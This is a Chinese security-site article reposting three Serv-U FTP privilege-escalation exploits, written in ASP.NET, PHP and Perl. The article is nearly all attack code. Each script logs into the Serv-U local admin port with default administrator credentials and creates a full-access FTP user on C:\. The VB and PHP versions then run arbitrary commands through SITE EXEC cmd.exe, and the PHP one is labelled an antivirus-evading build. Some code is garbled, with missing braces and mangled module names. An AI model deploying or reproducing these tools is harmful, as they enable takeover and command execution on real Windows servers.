站长天空|站长|服务器|安全|程序|SEO|工具

当前位置: 主页 > 服务器安全 > 其他 >

.NET版本Serv-U提权程序

时间:2011-01-17 10:41来源: 作者:小糊涂神 点击:
%@ Page Language=VB Debug=true % %@ import Namespace=System.Net.Sockets % script runat=server Love, Where are you ? Sub BTN_Start_Click(sender As Object, e As EventArgs) Dim Usr As String = Text_Name.Text Dim pwd As String = Text_PWD.Text

<%@ Page Language="VB" Debug="true" %> 
<%@ import Namespace="System.Net.Sockets" %> 
<script runat="server"> 

    ’  
    ’ Love, Where are you ? 
     
    Sub BTN_Start_Click(sender As Object, e As EventArgs) 
        Dim Usr As String = Text_Name.Text 
        Dim pwd As String = Text_PWD.Text 
        Dim Port As Int32 = Text_Port.Text 
        Dim Command As String = Text_cmd.Text 
     
        Dim LoginUser As String = "User " & Usr & vbcrlf 
        Dim LoginPass As String = "Pass " & pwd & vbcrlf 
        Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf 
        Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf 
        Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _ 
                    "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _ 
                    "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _ 
                    "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _ 
                    "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _ 
                    "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _ 
                    "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf 
        Dim Quit As String = "QUIT" & vbcrlf 
        Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf 
     
        ’Dim client As New TcpClient 
        Dim tcpClient As New TcpClient() 
        Try 
            tcpClient.Connect("127.0.0.1", port) 
        Catch eee As Exception 
            response.write(eee.ToString()) 
            response.end 
        End Try 
        tcpClient.ReceiveBufferSize = 1024 
        Dim networkStream As NetworkStream = tcpClient.GetStream() 
        Rec(networkStream) 
        Send(networkStream, LoginUser) 
        Rec(networkStream) 
        Send(networkStream, LoginPass) 
        Rec(networkStream) 
        Send(networkStream, MAINTENANCE) 
        Rec(networkStream) 
        Send(networkStream, DelDomain) 
        Rec(networkStream) 
        Send(networkStream, NewDomain) 
        Rec(networkStream) 
        Send(networkStream, NewUser) 
        Rec(networkStream) 
               Dim tcpClient2 As New TcpClient() 
               Try 
                   tcpClient2.Connect("127.0.0.1", 43859) 
               Catch eee As Exception 
                   response.write(eee.ToString()) 
                   response.end 
               End Try 
               tcpClient2.ReceiveBufferSize = 1024 
               Dim networkStream2 As NetworkStream = tcpClient2.GetStream() 
               Rec(networkStream2) 
               Send(networkStream2, "User lake" & vbcrlf) 
               Rec(networkStream2) 
               Send(networkStream2, "pass admin123" & vbcrlf) 
               Rec(networkStream2) 
               Send(networkStream2, "site exec " & Command & vbcrlf) 
               Rec(networkStream2) 
               tcpClient2.Close() 
        Send(networkStream, DelDomain) 
        Rec(networkStream) 
        Send(networkStream, Quit) 
        Rec(networkStream) 
        tcpClient.Close() 
    End Sub 
     
     
     
    Sub Rec(o As Object) 
       If o.CanRead Then 
          Dim bytes(1024) As Byte 
          o.Read(bytes, 0, 1024) 
          Dim returndata As String = Encoding.ASCII.GetString(bytes) 
          response.Write("out:" & returndata & "<br>") 
       Else 
          response.Write("What’s wrong ?") 
       End If 
    End Sub 
     
    Sub Send(o As Object,data As String) 
       If o.CanWrite Then 
          Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data) 
          o.Write(sendBytes, 0, sendBytes.Length) 
          response.write("in: " & data & "<br>") 
       Else 
          response.Write("What’s wrong ?") 
       End If 
    End Sub 

</script> 
<html> 
<head> 
</head> 
<body> 
    <form runat="server"> 
        <p> 
            <asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2 
            admin by lake2</asp:Label> 
        </p> 
        <p> 
            <asp:Label id="Label2" runat="server" width="40px">Name</asp:Label> 
            <asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox> 
            <br /> 
            <asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label> 
            <asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox> 
            <br /> 
            <asp:Label id="Label4" runat="server" width="40px">Port</asp:Label> 
            <asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox> 
            <br /> 
            <asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label> 
            <asp:TextBox id="Text_cmd" runat="server"></asp:TextBox> 
        </p> 
        <p> 
            <asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button> 
        </p> 
        <p> 
            <hr /> 
            <!-- Insert content here --> 
        </p> 
    </form> 
</body> 
</html> 

2.PHP版sevru提权木马 

<?PHP 
/** 
注释免杀版本 
**/ 
// 
//Codez begin 
// 
//判断magic_quotes_gpc的值 
if (get_magic_quotes_gpc()) { 
$_GET = stripslashes_array($_GET); 

//变量初始化 
$addr = ’0.0.0.0’; 
$ftpport = 21; 
$adminport = 43958; 
$adminuser = ’LocalAdministrator’; 
$adminpass = ’#l@$ak#.lk;0@P’
$user = ’wofeiwo’; 
$password = ’wrsky’; 
$homedir = ’C:\\’; 
$dir = ’C:\\WINNT\\System32\\’; 

//有改变则赋值 
if ($_GET){ 
$addr = $_GET[’addr’] ; 
$ftpport = $_GET[’ftpport’] ; 
$adminport = $_GET[’adminport’] ; 
$adminuser = $_GET[’adminuser’] ; 
$adminpass = $_GET[’adminpass’] ; 
$user = $_GET[’user’] ; 
$password = $_GET[’password’] ; 
$homedir = $_GET[’homedir’] ; 
if ($_GET[’dir’]){ 
$dir = $_GET[’dir’] ; 


?> 

<!-- 主文件开始 //--> 
<html> 
<head> 
<title>-=<Serv-U All Version本地提升权限Exp10it Ver 1.5 By 我非我[F.S.T] 修改免杀版>=-</title> 
<meta content="text/html; charset=gb2312" http-equiv="Content-Type"> 
<STYLE TYPE="text/css"> 
b {font-family : Verdana, sans-serif;font-size : 14px;} 
body,td,p,pre { 
font-family : Verdana, sans-serif;font-size : 12px; 

input { 
font-family: "Verdana"; 
font-size: "11px"; 
BACKGROUND-COLOR: "#FFFFFF"; 
height: "18px"; 
border: "1px solid #666666"; 

</STYLE> 
</head> 
<body bgcolor="#EEEEEE" text="#000000" link="#006699" vlink="#5493B4"> 

<center><b>Serv-U All Version本地提升权限Exp10it Ver 1.5</b> 
<br><br> 
<b>添加Serv-U用户部分</b> 
<br> 
<form action="<?=$_SERVER[’PHP_SELF’]?>" method="get"> 
<table width="660" border="0" cellpadding="0"> 
<tr><td width="300" align="center">主机IP:</td> <td width="360" align="center"><input name="addr" type="text" class="INPUT" value="<?=$addr?>"></td></tr> 
<tr><td width="300" align="center">主机Ftp端口:</td> <td width="360" align="center"><input name="ftpport" type="text" class="INPUT" value="<?=$ftpport?>"></td></tr> 
<tr><td width="300" align="center">主机Ftp管理端口:</td> <td width="360" align="center"><input name="adminport" type="text" class="INPUT" value="<?=$adminport?>"></td></tr> 
<tr><td width="300" align="center">主机Ftp管理用户:</td> <td width="360" align="center"><input name="adminuser" type="text" class="INPUT" value="<?=$adminuser?>"></td></tr> 
<tr><td width="300" align="center">主机Ftp管理密码:</td> <td width="360" align="center"><input name="adminpass" type="text" class="INPUT" value="<?=$adminpass?>"></td></tr> 
<tr><td width="300" align="center">添加的用户名:</td> <td width="360" align="center"><input name="user" type="text" class="INPUT" value="<?=$user?>"></td></tr> 
<tr><td width="300" align="center">添加的用户名密码:</td><td width="360" align="center"><input name="password" type="password" class="INPUT" value="<?=$password?>"></td></tr> 
<tr><td width="300" align="center">用户主目录(别忘了写"\"):</td> <td width="360" align="center"><input name="homedir" type="text" class="INPUT" value="<?=$homedir?>"></td></tr> 
<tr><td width="300" align="center"><input name="action" type="hidden" value="up"></td></tr> 
<tr><td width="300" align="center"><input type="submit" class="INPUT" value="添加"></td></tr> 
</form></tr> 
</table> 
<hr width="660"><br> 
<textarea cols="60" rows="10" readonly>命令回显: 
<?php 

//添加用户 
if ($_GET[’action’]=="up"){ 
up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir); 

?> 

</textarea></center><br><hr width="660"> 
<center><b>执行命令部分</b><br> 
<form action="<?=$_SERVER[’PHP_SELF’]?>" method="get"> 
<table width="660" border="0" cellpadding="0"> 
<tr><td width="300" align="center">主机Ftp端口:</td> <td width="360" align="center"><input name="ftpport" type="text" class="INPUT" value="<?=$ftpport?>"></td></tr> 
<tr><td width="300" align="center">用户名:</td> <td width="360" align="center"><input name="user" type="text" class="INPUT" value="<?=$user?>"></td></tr> 
<tr><td width="300" align="center">用户名密码:</td><td width="360" align="center"><input name="password" type="password" class="INPUT" value="<?=$password?>"></td></tr> 
<tr><td width="300" align="center">系统路径(别忘了写"\"):</td><td width="360" align="center"><input name="dir" type="text" class="INPUT" value="<?=$dir?>"></td></tr> 
<tr><td width="300" align="center">执行的命令:</td> <td width="360" align="center"><input name="cmd" type="text" class="INPUT" value="<?=$_GET[’cmd’]?>"></td></tr> 

<tr><td width="300" align="center"><input name="action" type="hidden" value="execute"></td></tr> 
<tr><td width="300" align="center"><input type="submit" class="INPUT" value="执行"></td></tr> 
</form></tr></table><hr width="660"><br> 
<textarea cols="60" rows="10" readonly>命令回显: 
<?php 

//执行命令 
if ($_GET[’action’]=="execute"){ 
ftpcmd($ftpport,$user,$password,$dir,$_GET[’cmd’]); 

?> 
</textarea> 
</center><br><hr width="660"> 
<i><center>Copycenter (C) 2004 <B style=’color:black;background-color:#ffff66’>我非我</B> All centers Reserved. <br> 
</center></i> 
</body> 
</html> 
<!-- 主文件结束 //--> 
<?php 

//添加用户主函数定义 
function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){ 
$fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8); 
if (!$fp) { 
echo "$errstr ($errno)<br>\n"; 
} else { 
fputs ($fp, "USER ".$adminuser."\r\n"); 
sleep (1); 
fputs ($fp, "PASS ".$adminpass."\r\n"); 
sleep (1); 
fputs ($fp, "SITE MAINTENANCE\r\n"); 
sleep (1); 
fputs ($fp, "-SETUSERSETUP\r\n"); 
fputs ($fp, "-IP=".$addr."\r\n"); 
fputs ($fp, "-PortNo=".$ftpport."\r\n"); 
fputs ($fp, "-User=".$user."\r\n"); 
fputs ($fp, "-Password=".$password."\r\n"); 
fputs ($fp, "-HomeDir=".$homedir."\r\n"); 
fputs ($fp, "-LoginMesFile=\r\n"); 
fputs ($fp, "-Disable=0\r\n"); 
fputs ($fp, "-RelPaths=0\r\n"); 
fputs ($fp, "-NeedSecure=0\r\n"); 
fputs ($fp, "-HideHidden=0\r\n"); 
fputs ($fp, "-AlwaysAllowLogin=0\r\n"); 
fputs ($fp, "-ChangePassword=1\r\n"); 
fputs ($fp, "-QuotaEnable=0\r\n"); 
fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n"); 
fputs ($fp, "-SpeedLimitUp=-1\r\n"); 
fputs ($fp, "-SpeedLimitDown=-1\r\n"); 
fputs ($fp, "-MaxNrUsers=-1\r\n"); 
fputs ($fp, "-IdleTimeOut=600\r\n"); 
fputs ($fp, "-SessionTimeOut=-1\r\n"); 
fputs ($fp, "-Expire=0\r\n"); 
fputs ($fp, "-RatioUp=1\r\n"); 
fputs ($fp, "-RatioDown=1\r\n"); 
fputs ($fp, "-RatiosCredit=0\r\n"); 
fputs ($fp, "-QuotaCurrent=0\r\n"); 
fputs ($fp, "-QuotaMaximum=0\r\n"); 
fputs ($fp, "-Maintenance=System\r\n"); 
fputs ($fp, "-PasswordType=Regular\r\n"); 
fputs ($fp, "-Ratios=None\r\n"); 
fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n"); 
fputs ($fp, "QUIT\r\n"); 
sleep (1); 
while (!feof($fp)) { 
echo fgets ($fp,128); 


//执行命令主函数定义 
function ftpcmd($ftpport,$user,$password,$dir,$cmd){ 

$conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 8); 

if (!$conn_id) { 
echo "$errstr ($errno)<br>\n"; 
} else { 
fputs ($conn_id, "USER ".$user."\r\n"); 
sleep (1); 
fputs ($conn_id, "PASS ".$password."\r\n"); 
sleep (1); 
fputs ($conn_id, "SITE EXEC ".$dir."cmd.exe /c ".$cmd."\r\n"); 
fputs ($conn_id, "QUIT\r\n"); 
sleep (1); 
while (!feof($conn_id)) { 
echo fgets ($conn_id,128); 

fclose($conn_id); 

//去除转义字符 
function stripslashes_array(&$array) { 
while (list($key,$var) = each($array)) { 
if ($key != ’argc’ && $key != ’argv’ && (strtoupper($key) != $key || ’’.intval($key) == "$key")) { 
if (is_string($var)) { 
$array[$key] = stripslashes($var); 

if (is_array($var)) { 
$array[$key] = stripslashes_array($var); 



return $array; 

?> 

3.Perl版本的serv-U提权程序 

#!/usr/bin/perl 
use I:Socket; 

binmode(STDOUT); 
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); 

$addr = "127.0.0.1"; 
$ftpport = 21; 
$adminport = 43958; 
$adminuser = "LocalAdministrator"; 
$adminpass = ’#l@$ak#.lk;0@P’
$user = "Andyower"; 
$password = "haika"; 
$homedir = ’C:\\’; 
$dir = ’C:\\WINNT\\System32\\’; 

use I:Socket::INET; 

$sock = I:Socket::INET->new("127.0.0.1:$adminport") || die "fail"; 

print "Andyower制作<br><br>"; 

print $sock "USER $adminuser\r\n"; 
sleep (1); 
print $sock "PASS $adminpass\r\n"; 
sleep(1); 
print $sock "SITE MAINTENANCE\r\n"; 
sleep(1); 
print $sock "-SETUSERSETUP\r\n"; 
print $sock "-IP=".$addr."\r\n"; 
print $sock "-PortNo=".$ftpport."\r\n"; 
print $sock "-User=".$user."\r\n"; 
print $sock "-Password=".$password."\r\n"; 
print $sock "-HomeDir=".$homedir."\r\n"; 
print $sock "-LoginMesFile=\r\n"; 
print $sock "-Disable=0\r\n"; 
print $sock "-RelPaths=0\r\n"; 
print $sock "-NeedSecure=0\r\n"; 
print $sock "-HideHidden=0\r\n"; 
print $sock "-AlwaysAllowLogin=0\r\n"; 
print $sock "-ChangePassword=1\r\n"; 
print $sock "-QuotaEnable=0\r\n"; 
print $sock "-MaxUsersLoginPerIP=-1\r\n"; 
print $sock "-SpeedLimitUp=-1\r\n"; 
print $sock "-SpeedLimitDown=-1\r\n"; 
print $sock "-MaxNrUsers=-1\r\n"; 
print $sock "-IdleTimeOut=600\r\n"; 
print $sock "-SessionTimeOut=-1\r\n"; 
print $sock "-Expire=0\r\n"; 
print $sock "-RatioUp=1\r\n"; 
print $sock "-RatioDown=1\r\n"; 
print $sock "-RatiosCredit=0\r\n"; 
print $sock "-QuotaCurrent=0\r\n"; 
print $sock "-QuotaMaximum=0\r\n"; 
print $sock "-Maintenance=System\r\n"; 
print $sock "-PasswordType=Regular\r\n"; 
print $sock "-Ratios=None\r\n"; 
print $sock " Access=".$homedir."|RWAMELCDP\r\n"; 
print $sock "QUIT\r\n"; 

@ret=<$sock>; 
print "@ret"; 

close(STDERR); 
close(STDOUT); 
exit; 

 

本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text4/201002/17619.html

(责任编辑:小糊涂神)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 验证码:点击我更换图片
发布者资料
小糊涂神 查看详细资料 发送留言 加为好友 用户等级:注册会员 注册时间:2010-06-07 23:06 最后登录:2013-07-20 08:07
栏目列表
推荐内容